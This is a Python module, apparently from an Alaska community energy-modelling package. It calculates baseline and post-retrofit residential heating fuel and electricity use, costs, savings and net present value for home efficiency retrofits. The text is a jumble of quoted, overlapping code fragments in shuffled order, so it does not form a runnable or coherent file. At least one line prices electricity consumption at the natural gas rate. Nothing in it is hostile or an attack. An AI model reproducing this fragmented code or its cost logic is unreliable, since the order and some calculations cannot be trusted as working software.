self.proposed_fuel_LP_consumption = \\ self.baseline_fuel_LP_consumption - self.savings_LP self.proposed_fuel_gas_consumption = \\ self.baseline_fuel_gas_consumption -", "HF_price = (self.diesel_prices + self.cd['heating fuel premium']) wood_price = self.cd['cordwood price'] elec_price =", "aaem.community_data import CommunityData from aaem.forecast import Forecast from aaem.diagnostics import Diagnostics import aaem.constants", "[mmbtu/year]\", years, self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [cords/year]\", years, self.baseline_fuel_wood_consumption) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords)", "= self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf r_NG = self.proposed_fuel_gas_consumption/constants.mmbtu_to_Mcf s_NG = b_NG - r_NG b_NG_cost = self.baseline_fuel_gas_consumption", "= np.float64(rd[\"Fuel Oil\"]) / 100.0 self.savings_HF = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt,", "(gallons/year) Cost Baseline\": b_oil_cost, \"Residential: Heating Oil (gallons/year) Cost Post Retrofit\": r_oil_cost ,", "r_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\": s_NG, \"Residential: Heating Natural Gas", "np.float64(rd[\"Electricity\"]/100.0)*\\ scaler * constants.mmbtu_to_kWh #~ self.baseline_fuel_coal_consumption #~ self.baseline_fuel_solar_consumption #~ self.baseline_fuel_other_consumption if self.cd['natural gas", "are the difference in the base and proposed fuel costs \"\"\" self.annual_electric_savings =", "Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Post Retrofit\", \"Residential: Heating Fuel All", "self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 percent_accounted += amnt self.init_wood", "heating 
oil consumption savings_wood : float savings in heating cordwood consumption savings_gas :", "* self.refit_cost_rate def calc_annual_electric_savings (self): \"\"\"calculate annual electric savings created by the project", "self.calc_annual_electric_savings() self.calc_annual_heating_savings() self.calc_annual_total_savings() self.calc_annual_costs(self.cd['interest rate'], scalers['capital costs']) self.calc_annual_net_benefit() self.calc_npv(self.cd['discount rate'], self.cd['current year']) self.calc_levelized_costs(0)", "Savings\": self.get_base_HF_use() -\\ self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\": self.get_base_HF_cost(), \"Residential:", "Costs, NPV Net Benefits, Benefit-Cost Ratio, Levelized Cost of Energy, and Internal Rate", ": np.array baseline cordwood consumption baseline_fuel_gas_consumption : np.array baseline natural gas consumption baseline_fuel_LP_consumption", "fuel costs Attributes ---------- baseline_HF_cost : np.array baseline cost of heating fuels per", "scaler * constants.mmbtu_to_Mcf self.baseline_fuel_LP_consumption = \\ self.init_LP+np.float64(rd[\"LP\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_LP self.baseline_fuel_kWh_consumption = self.init_kWh+\\", "'residential': self.was_run = False self.reason = \"Not a residential project.\" return # needed", "HH = self.households #~ print HH area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI", "scaler = (HH - self.init_HH) * area * EUI self.baseline_fuel_Hoil_consumption = \\ self.init_HF+np.float64(rd[\"Fuel", "Attributes ---------- proposed_fuel_Hoil_consumption : np.array proposed heating oil consumption proposed_fuel_wood_consumption : np.array proposed", "(MMBtu/year) Cost Savings\": self.get_heating_savings_costs(), \"Residential: Heating Oil (gallons/year) Consumption Baseline\": b_oil, \"Residential: Heating", "kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh self.proposed_kWh_cost = self.proposed_kWh_consumption * kWh_cost def 
calc_capital_costs (self):", "DataFrame import os from aaem.components.annual_savings import AnnualSavings from aaem.community_data import CommunityData from aaem.forecast", "b_oil_cost, \"Residential: Heating Oil (gallons/year) Cost Post Retrofit\": r_oil_cost , \"Residential: Heating Oil", "Post Retrofit\", \"Residential: Electric Heat (kWh/year) Consumption Savings\", \"Residential: Heating Propane (gallons/year) Consumption", "\"\"\"Set columns in the the forecast to values calculated in this component \"\"\"", "df.round().astype(int) except ValueError: pass df = df[[ \"Residential: Heating Oil (gallons/year) Consumption Baseline\",", "---------- fuel_amnt: float % of fuel used total_consumption : float total consumption for", "len(kWh_cost) self.baseline_kWh_cost = self.baseline_kWh_consumption * kWh_cost def calc_proposed_fuel_consumption (self): \"\"\"Calculate the proposed heating", "community_data.get_section('community') #~ self.copied_elec = community_data.copies.\\ #~ ix[\"yearly electric summary\"].values[0] if self.cd[\"model electricity\"]: self.elec_prices", "\"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\", \"Residential: Heating Natural Gas (Mcf/year) Consumption", "self.capital_costs = self.opportunity_HH * self.refit_cost_rate def calc_annual_electric_savings (self): \"\"\"calculate annual electric savings created", "Electric Heat (kWh/year) Consumption Savings\": s_elec, \"Residential: Electric Heat (kWh/year) Cost Baseline\": b_elec_cost,", "efficiency of residential buildings (homes). Consumption and savings are based on the number", "self.proposed_HF_consumption[:self.actual_project_life] return (base_heat - post_heat) * constants.mmbtu_to_gal_HF def get_total_energy_produced (self): \"\"\"Get total energy", ": np.array proposed heating oil consumption proposed_fuel_wood_consumption : np.array proposed cordwood consumption proposed_fuel_LP_consumption", "cost to retrofit each home is also calculated. 
Parameters ---------- community_data : CommunityData", "Electric Heat (kWh/year) Cost Baseline\", \"Residential: Electric Heat (kWh/year) Cost Post Retrofit\", \"Residential:", "/ self.base_pop))) def run (self, scalers = {'capital costs':1.0}): \"\"\"Runs the component. The", "a known Heat Recovery project for this component to run. Parameters ---------- scalers", "print self.opportunity_HH if self.opportunity_HH < 0: self.opportunity_HH = 0 self.diagnostics.add_note(self.component_name, \"calculate Houses to", "np.float64(fuel_amnt * (total_consumption - HH_consumption) * cf) def calc_baseline_fuel_consumption (self): \"\"\"Calculate baseline fuel", "specific data for a community. Initial value: 'Residential Buildings' section of community_data See", "electric consumption \"\"\" self.proposed_fuel_Hoil_consumption = \\ self.baseline_fuel_Hoil_consumption - self.savings_HF self.proposed_fuel_wood_consumption = \\ self.baseline_fuel_wood_consumption", "improvements ($) \"\"\" self.capital_costs = self.opportunity_HH * self.refit_cost_rate def calc_annual_electric_savings (self): \"\"\"calculate annual", "r_LP = self.proposed_fuel_LP_consumption/constants.mmbtu_to_gal_LP s_LP = b_LP - r_LP b_LP_cost = self.baseline_fuel_LP_consumption * LP_price", "\"Residential: Heating Propane (gallons/year) Consumption Savings\": s_LP, \"Residential: Heating Propane (gallons/year) Cost Baseline\":", "cost'] * \\ community_data.get_item( 'community', 'regional construction multiplier' ) self.set_project_life_details( self.comp_specs[\"start year\"], self.comp_specs[\"lifetime\"]", "= forecast self.refit_cost_rate = \\ self.comp_specs['average refit cost'] * \\ community_data.get_item( 'community', 'regional", "+= amnt self.init_gas = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0", "savings in heating cordwood consumption savings_gas : float savings in natural gas fuel", "prices') self.comp_specs = 
community_data.get_section(COMPONENT_NAME) self.component_name = COMPONENT_NAME self.forecast = forecast self.refit_cost_rate = \\", "value: 'Residential Buildings' section of community_data See also -------- aaem.community_data : community data", "#~ self.init_coal #~ self.init_solar #~ self.init_other msg = str(round(percent_accounted)) + \\ \" of", "proposed_HF_cost : np.array proposed heating fuel cost \"\"\" HF_price = (self.diesel_prices + self.cd['heating", "np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) avg_EUI_reduction = np.float64(rd[\"Post-Retrofit", "cost of electricity per year \"\"\" self.cd[\"electric prices\"].index = \\ self.cd[\"electric prices\"].index.astype(int) #~", "self.baseline_fuel_Hoil_consumption) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [cords/year]\", years, self.baseline_fuel_wood_consumption) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed", "Ratio, Levelized Cost of Energy, and Internal Rate of Return will all be", "(gallons/year) Cost Post Retrofit\": r_oil_cost , \"Residential: Heating Oil (gallons/year) Cost Savings\": s_oil_cost,", "forecasted price of offset heating fuels. 
The cost to retrofit each home is", "CommunityData Object aaem.forecast : forecast module, see information on Forecast Object aaem.diagnostics :", "def calc_baseline_fuel_consumption (self): \"\"\"Calculate baseline fuel consumption Attributes: baseline_fuel_Hoil_consumption : np.array baseline heating", "self.baseline_fuel_gas_consumption * gas_price + \\ self.baseline_fuel_LP_consumption * LP_price + \\ self.baseline_fuel_kWh_consumption * gas_price", "= DataFrame({ \"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\": self.get_base_HF_use(), \"Residential: Heating Fuel", "<gh_stars>1-10 \"\"\" Residential Efficiency component body ------------------------------------- \"\"\" import numpy as np from", "np.float64(rd[\"LP\"]) / 100.0 self.savings_LP = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1,", "Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Cost Savings\", \"Residential: Heating Fuel All (MMBtu/year)", "HF_price + \\ self.baseline_fuel_wood_consumption * wood_price + \\ self.baseline_fuel_gas_consumption * gas_price + \\", "False otherwise reason : string lists reason for failure if run == False", "prerequisite component data this component has no prerequisites leave empty Attributes ---------- diagnostics", "run variables. See note on accepted scalers Attributes ---------- run : bool True", "Electric Heat (kWh/year) Consumption Baseline\": b_elec, \"Residential: Electric Heat (kWh/year) Consumption Post Retrofit\":", "* constants.mmbtu_to_gal_HF def get_total_energy_produced (self): \"\"\"Get total energy produced. 
Returns ------- float the", "a # of houses cf: float conversion factor Returns ------- float: fuel consumed", "\"propane_residential_consumed [gallons/year]\", years, self.baseline_fuel_LP_consumption) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP) self.forecast.add_heat_demand_column(\\ \"heat_energy_demand_residential [mmbtu/year]\", years,", "value: diag or new diagnostics object forecast : forecast community forecast for estimating", "* self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0", "Heating Biomass (cords/year) Consumption Baseline\", \"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\", \"Residential:", "for a community. Initial value: 'community' section of community_data comp_specs : dictionary component", "wood_price = self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price = self.cd['propane price'] gas_price", "\"Residential: Heating Biomass (cords/year) Cost Savings\", \"Residential: Electric Heat (kWh/year) Cost Baseline\", \"Residential:", "< 0: self.opportunity_HH = 0 self.diagnostics.add_note(self.component_name, \"calculate Houses to retrofit was negative, setting", "Forecast from aaem.diagnostics import Diagnostics import aaem.constants as constants from config import COMPONENT_NAME,", "self.savings_mmbtu if self.cd['natural gas price'] == 0: self.proposed_fuel_gas_consumption = 0 # coal,solar, other", "\"Residential: Electric Heat (kWh/year) Cost Post Retrofit\": r_elec_cost, \"Residential: Electric Heat (kWh/year) Cost", "Consumption Savings\", \"Residential: Electric Heat (kWh/year) Consumption Baseline\", \"Residential: Electric Heat (kWh/year) Consumption", "= b_LP_cost - r_LP_cost b_NG = self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf r_NG = 
self.proposed_fuel_gas_consumption/constants.mmbtu_to_Mcf s_NG = b_NG", "savings in electric consumption savings_mmbtu: float total savings in mmbtu \"\"\" rd =", "adjust normal run variables. See note on accepted scalers Attributes ---------- run :", "self.baseline_HF_cost = \\ self.baseline_fuel_Hoil_consumption * HF_price + \\ self.baseline_fuel_wood_consumption * wood_price + \\", "= self.cd['cordwood price'] elec_price = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] LP_price = self.cd['propane price'] gas_price", "Post Retrofit\": r_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost Savings\": s_NG_cost, \"Residential: Total", "total = area * EUI # the one in each of these function", "Benefit ($/year)\" ]] df[\"community\"] = self.cd['name'] df[\"population\"] = self.forecast.get_population(self.start_year, self.end_year).astype(int) df = df[df.columns[-2:].tolist()", "self.calc_npv(self.cd['discount rate'], self.cd['current year']) self.calc_levelized_costs(0) def get_fuel_total_saved (self): \"\"\"Get total fuel saved. 
Returns", "Natural Gas (Mcf/year) Consumption Post Retrofit\": r_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption", "Consumption Savings\": s_NG, \"Residential: Heating Natural Gas (Mcf/year) Cost Baseline\": b_NG_cost, \"Residential: Heating", "(gallons/year) Cost Savings\", \"Residential: Heating Natural Gas (Mcf/year) Cost Baseline\", \"Residential: Heating Natural", "= np.float64(rd[\"Electricity\"]) / 100.0 self.savings_kWh = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total,", "gas consumption proposed_fuel_kWh_consumption : np.array proposed electric consumption proposed_HF_consumption : np.array proposed total", "(1/constants.mmbtu_to_kWh) +\\ self.baseline_fuel_LP_consumption * (1/constants.mmbtu_to_gal_LP) def calc_baseline_kWh_consumption (self): \"\"\"Calculate the baseline kWh consumption", "diag = None, prerequisites = {}): \"\"\"Class initialiser Parameters ---------- community_data : CommunityData", ": np.array set to baseline values \"\"\" self.proposed_kWh_consumption = self.baseline_kWh_consumption def calc_proposed_fuel_cost (self):", "consumption per household (kWh/year). 
>= 6000 \"\"\" # 500 average energy use, 12", "Cost Savings\", \"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\", \"Residential: Heating Fuel All", "* wood_price + \\ self.baseline_fuel_gas_consumption * gas_price + \\ self.baseline_fuel_LP_consumption * LP_price +", "self.init_LP+np.float64(rd[\"LP\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_LP self.baseline_fuel_kWh_consumption = self.init_kWh+\\ np.float64(rd[\"Electricity\"]/100.0)*\\ scaler * constants.mmbtu_to_kWh #~ self.baseline_fuel_coal_consumption", "diagnostics, optional diagnostics for tracking error/warning messages prerequisites : dictionary of components, optional", "error/warning messages initial value: diag or new diagnostics object forecast : forecast community", "= self.proposed_fuel_wood_consumption/constants.mmbtu_to_cords s_bio = b_bio - r_bio b_bio_cost = self.baseline_fuel_wood_consumption * wood_price r_bio_cost", "np.array proposed cordwood consumption proposed_fuel_LP_consumption : np.array proposed LP consumption proposed_fuel_gas_consumption : np.array", "self.baseline_fuel_gas_consumption * gas_price r_NG_cost = self.proposed_fuel_gas_consumption * gas_price s_NG_cost = b_NG_cost - r_NG_cost", "Savings\", \"Residential: Total Cost Savings ($/year)\", \"Residential: Net Benefit ($/year)\" ]] df[\"community\"] =", "self.households = households.ix[self.start_year:self.end_year].T.values[0] val = self.forecast.get_population(self.start_year) HH =self.comp_specs['data']['Total Occupied'] self.init_HH = int(round(HH*(val /", "constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 percent_accounted += amnt self.init_wood = self.calc_consumption_by_fuel(amnt, total,", "area * EUI # the one in each of these function calls is", ": np.array baseline heating fuel consumption baseline_fuel_wood_consumption : np.array baseline cordwood consumption baseline_fuel_gas_consumption", "body ------------------------------------- \"\"\" import numpy as np from pandas import 
DataFrame import os", "self.baseline_fuel_Hoil_consumption * HF_price r_oil_cost = self.proposed_fuel_Hoil_consumption * HF_price s_oil_cost = b_oil_cost - r_oil_cost", "self.cd[\"model heating fuel\"]: #~ self.calc_init_HH() self.calc_savings_opportunities() self.calc_init_consumption() self.calc_baseline_fuel_consumption() self.calc_proposed_fuel_consumption() #~ self.set_forecast_columns() if self.cd[\"model", "val = self.forecast.get_population(self.start_year) HH =self.comp_specs['data']['Total Occupied'] self.init_HH = int(round(HH*(val / self.base_pop))) def run", "float initial electric consumption \"\"\" rd = self.comp_specs['data'] ## total consumption total =", "Gas\"]/100.0) * \\ scaler * constants.mmbtu_to_Mcf self.baseline_fuel_LP_consumption = \\ self.init_LP+np.float64(rd[\"LP\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_LP", "(MMBtu/year) Consumption Post Retrofit\": self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\": self.get_base_HF_use()", "Gas (Mcf/year) Consumption Baseline\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Post Retrofit\", \"Residential:", "run == False Notes ----- Accepted scalers: capital costs. 
\"\"\" self.was_run = True", "* \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_kWh) #~ self.savings_coal #~ self.savings_solar #~ self.savings_other self.savings_mmbtu", "baseline kWh consumption for a community Attributes ---------- baseline_kWh_consumption : np.array electric consumption", "proposed LP consumption proposed_fuel_gas_consumption : np.array proposed natural gas consumption proposed_fuel_kWh_consumption : np.array", "Cost Savings\": self.get_heating_savings_costs(), \"Residential: Heating Oil (gallons/year) Consumption Baseline\": b_oil, \"Residential: Heating Oil", "proposed electric consumption proposed_HF_consumption : np.array proposed total electric consumption \"\"\" self.proposed_fuel_Hoil_consumption =", "rd[\"Fuel Oil\"] / 100.0 HH = self.households #~ print HH area = np.float64(rd[\"Pre-Retrofit", "savings in propane consumption savings_kWh : float savings in electric consumption savings_mmbtu: float", "(kWh/year) Cost Baseline\", \"Residential: Electric Heat (kWh/year) Cost Post Retrofit\", \"Residential: Electric Heat", "self.get_proposed_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost Savings\": self.get_heating_savings_costs(), \"Residential: Heating Oil (gallons/year)", "saved in gallons \"\"\" base_heat = \\ self.baseline_HF_consumption[:self.actual_project_life] post_heat = \\ self.proposed_HF_consumption[:self.actual_project_life] return", "1, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 self.savings_LP = avg_EUI_reduction * self.opportunity_HH *", "Propane (gallons/year) Cost Savings\", \"Residential: Heating Natural Gas (Mcf/year) Cost Baseline\", \"Residential: Heating", "\"Residential: Total Cost Savings ($/year)\": self.get_total_savings_costs(), \"Residential: Net Benefit ($/year)\": self.get_net_benefit(), }, years)", "self.baseline_fuel_gas_consumption = 0 self.baseline_HF_consumption = \\ self.baseline_fuel_Hoil_consumption * \\ (1/constants.mmbtu_to_gal_HF) +\\ 
self.baseline_fuel_wood_consumption *", "in a year. That's where the 6000.0 # comes from. con_threshold = self.comp_specs['min", "b_elec, \"Residential: Electric Heat (kWh/year) Consumption Post Retrofit\": r_elec, \"Residential: Electric Heat (kWh/year)", "on Forecast Object aaem.diagnostics : diagnostics module, see information on Diagnostics Object \"\"\"", ": np.array electric consumption per yer \"\"\" HH = self.households self.baseline_kWh_consumption = self.avg_kWh_consumption_per_HH", "or new diagnostics object forecast : forecast community forecast for estimating future values", "\\ self.baseline_fuel_kWh_consumption * gas_price # coal,solar, other def calc_baseline_kWh_cost (self): \"\"\"calculate baseline electricity", "- r_NG_cost years = np.array(range(self.project_life)) + self.start_year df = DataFrame({ \"Residential: Heating Fuel", "(self): \"\"\"Calculate post retrofit electricity costs Attributes ---------- proposed_kWh_cost: np.array proposed electricity cost", "years) try: df = df.round().astype(int) except ValueError: pass df = df[[ \"Residential: Heating", "diagnostics() self.intertie_data = community_data.intertie_data self.cd = community_data.get_section('community') #~ self.copied_elec = community_data.copies.\\ #~ ix[\"yearly", "type of fuel \"\"\" HH_consumption = HH * self.avg_kWh_consumption_per_HH * \\ constants.kWh_to_mmbtu return", "self.fuel_oil_percent = rd[\"Fuel Oil\"] / 100.0 HH = self.households #~ print HH area", "\\ rd[\"BEES Total Consumption (MMBtu)\"] + \\ rd[\"Pre-Retrofit Avg Area (SF)\"] * \\", "annual electric savings created by the project Attributes ---------- annual_electric_savings : np.array electric", "Cost Post Retrofit\": r_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Savings\": s_bio_cost, \"Residential: Electric", "capital_costs : float total cost of improvements ($) \"\"\" self.capital_costs = self.opportunity_HH *", "gas_price def calc_proposed_kWh_cost (self): \"\"\"Calculate post retrofit 
electricity costs Attributes ---------- proposed_kWh_cost: np.array", "calc_init_HH (self): \"\"\"Estimate the # of households for the first year of the", "= \\ self.baseline_fuel_Hoil_consumption * \\ (1/constants.mmbtu_to_gal_HF) +\\ self.baseline_fuel_wood_consumption * \\ (1/constants.mmbtu_to_cords) +\\ self.baseline_fuel_gas_consumption", "r_bio_cost = self.proposed_fuel_wood_consumption * wood_price s_bio_cost = b_bio_cost - r_bio_cost b_elec = self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh", "kWh/yr*$/kWh self.proposed_kWh_cost = self.proposed_kWh_consumption * kWh_cost def calc_capital_costs (self): \"\"\"Calculate the capital costs.", "Natural Gas (Mcf/year) Cost Savings\": s_NG_cost, \"Residential: Total Cost Savings ($/year)\": self.get_total_savings_costs(), \"Residential:", "consumption baseline_fuel_kWh_consumption : np.array baseline electricity consumption baseline_HF_consumption : np.array baseline total heating", "def calc_proposed_fuel_cost (self): \"\"\"Calculate proposed heating cost Attributes ---------- proposed_HF_cost : np.array proposed", "self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [Mcf/year]\", years, self.baseline_fuel_gas_consumption) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed", "def __init__ (self, community_data, forecast, diag = None, prerequisites = {}): \"\"\"Class initialiser", "= np.float64(rd[\"Post-Retrofit Avg. EUI Reduction\"]) total = area * EUI # the one", "None: self.diagnostics = diagnostics() self.intertie_data = community_data.intertie_data self.cd = community_data.get_section('community') #~ self.copied_elec =", "2010, the performance improvements as a percentage of the pre-retrofit consumption, and the", "per household (kWh/year). 
>= 6000 \"\"\" # 500 average energy use, 12 months", "rate'], scalers['capital costs']) self.calc_annual_net_benefit() self.calc_npv(self.cd['discount rate'], self.cd['current year']) self.calc_levelized_costs(0) def get_fuel_total_saved (self): \"\"\"Get", "years, self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP) self.forecast.add_heat_demand_column(\\ \"heat_energy_demand_residential [mmbtu/year]\", years, self.baseline_HF_consumption) def save_component_csv (self, directory): \"\"\"Save the", "r_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost Savings\": s_NG_cost, \"Residential: Total Cost Savings", "* self.opportunity_HH #~ self.baseline_total_energy_consumption = total HH = self.init_HH percent_accounted = 0 amnt", "to completion, False otherwise reason : string lists reason for failure if run", "in heating oil consumption savings_wood : float savings in heating cordwood consumption savings_gas", "= self.proposed_fuel_Hoil_consumption * HF_price s_oil_cost = b_oil_cost - r_oil_cost b_bio = self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords r_bio", "heating fuels per year \"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel premium']) self.hoil_price", "be calculated. There must be a known Heat Recovery project for this component", "(1/constants.mmbtu_to_gal_HF) +\\ self.savings_wood * (1/constants.mmbtu_to_cords) +\\ self.savings_gas * (1/constants.mmbtu_to_Mcf) +\\ self.savings_kWh * (1/constants.mmbtu_to_kWh)", "energy use, 12 months in a year. That's where the 6000.0 # comes", "= avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility", "Baseline\": b_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Post Retrofit\": r_bio_cost, \"Residential: Heating Biomass", "\"\"\"Runs the component. 
The Annual Total Savings,Annual Costs, Annual Net Benefit, NPV Benefits,", "\"\"\" if not self.was_run: return if self.cd[\"model financial\"]: HF_price = (self.diesel_prices + self.cd['heating", "premium']) wood_price = self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price = self.cd['propane price']", "else: HF_price = np.nan wood_price = np.nan elec_price = np.nan LP_price = np.nan", "Savings\": s_elec, \"Residential: Electric Heat (kWh/year) Cost Baseline\": b_elec_cost, \"Residential: Electric Heat (kWh/year)", "self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [cords/year]\", years, self.baseline_fuel_wood_consumption) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [Mcf/year]\",", "fuel from the total consumption Parameters ---------- fuel_amnt: float % of fuel used", "(Mcf/year) Cost Baseline\": b_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost Post Retrofit\": r_NG_cost,", ", \"Residential: Heating Oil (gallons/year) Cost Savings\": s_oil_cost, \"Residential: Heating Biomass (cords/year) Consumption", "the proposed heating fuel consumption Attributes ---------- proposed_fuel_Hoil_consumption : np.array proposed heating oil", "by the project Attributes ---------- annual_heating_savings : np.array heating savings ($/year) \"\"\" self.annual_heating_savings", "\" of residential fuel sources accounted for\" self.diagnostics.add_note(self.component_name, msg) def calc_savings_opportunities (self): \"\"\"Calculate", "Consumption (MMBtu)\"] + \\ rd[\"Pre-Retrofit Avg Area (SF)\"] * \\ rd[\"Pre-Retrofit Avg EUI", "= \"OK\" tag = self.cd['file id'].split('+') if len(tag) > 1 and tag[1] !=", "\"\"\" self.proposed_fuel_Hoil_consumption = \\ self.baseline_fuel_Hoil_consumption - 
self.savings_HF self.proposed_fuel_wood_consumption = \\ self.baseline_fuel_wood_consumption - self.savings_wood", "self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [cords/year]\", years, self.baseline_fuel_wood_consumption) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [mmbtu/year]\",", "wood_price r_bio_cost = self.proposed_fuel_wood_consumption * wood_price s_bio_cost = b_bio_cost - r_bio_cost b_elec =", "self.get_net_benefit(), }, years) try: df = df.round().astype(int) except ValueError: pass df = df[[", "leave empty Attributes ---------- diagnostics : diagnostics for tracking error/warning messages initial value:", "costs \"\"\" self.annual_electric_savings = np.zeros(self.project_life) def calc_annual_heating_savings (self): \"\"\"calculate annual heating savings created", "consumption Attributes ---------- proposed_fuel_Hoil_consumption : np.array proposed heating oil consumption proposed_fuel_wood_consumption : np.array", "#~ self.baseline_total_energy_consumption = total HH = self.init_HH percent_accounted = 0 amnt = np.float64(rd[\"Fuel", "\"Residential: Heating Oil (gallons/year) Consumption Savings\": s_oil, \"Residential: Heating Oil (gallons/year) Cost Baseline\":", "df[\"population\"] = self.forecast.get_population(self.start_year, self.end_year).astype(int) df = df[df.columns[-2:].tolist() + df.columns[:-2].tolist()] fname = os.path.join(directory, self.cd['name']", "Parameters ---------- scalers : dictionary of valid scalers, optional Scalers to adjust normal", "+\\ self.component_name.lower() + \"_output.csv\") fname = fname.replace(\" \",\"_\") # save to end of", "scalers : dictionary of valid scalers, optional Scalers to adjust normal run variables.", "np.nan b_oil = self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF 
r_oil = self.proposed_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF s_oil = b_oil - r_oil b_oil_cost", "Heat (kWh/year) Cost Savings\", \"Residential: Heating Propane (gallons/year) Cost Baseline\", \"Residential: Heating Propane", "(SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) scaler = (HH - self.init_HH) *", "of residential fuel sources accounted for\" self.diagnostics.add_note(self.component_name, msg) def calc_savings_opportunities (self): \"\"\"Calculate savings", "to values calculated in this component \"\"\" years = range(self.start_year,self.end_year) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [gallons/year]\",", "Heating Fuel All (MMBtu/year) Cost Savings\": self.get_heating_savings_costs(), \"Residential: Heating Oil (gallons/year) Consumption Baseline\":", "\"Residential: Heating Fuel All (MMBtu/year) Consumption Post Retrofit\": self.get_proposed_HF_use(), \"Residential: Heating Fuel All", "---------- proposed_kWh_cost: np.array proposed electricity cost \"\"\" kWh_cost = self.cd[\"electric prices\"].\\ ix[self.start_year:self.end_year] kWh_cost", "---------- directory : path output directory \"\"\" if not self.was_run: return if self.cd[\"model", "avg_con = self.intertie_data.get_item( 'Residential Energy Efficiency', 'data' )['average kWh per house'] #~ self.avg_monthly_consumption", "r_bio b_bio_cost = self.baseline_fuel_wood_consumption * wood_price r_bio_cost = self.proposed_fuel_wood_consumption * wood_price s_bio_cost =", "constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 percent_accounted += amnt self.init_kWh = self.calc_consumption_by_fuel(amnt, total,", "Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) scaler = (HH -", "($/year)\" ]] df[\"community\"] = self.cd['name'] df[\"population\"] = self.forecast.get_population(self.start_year, self.end_year).astype(int) df = df[df.columns[-2:].tolist() +", "return 
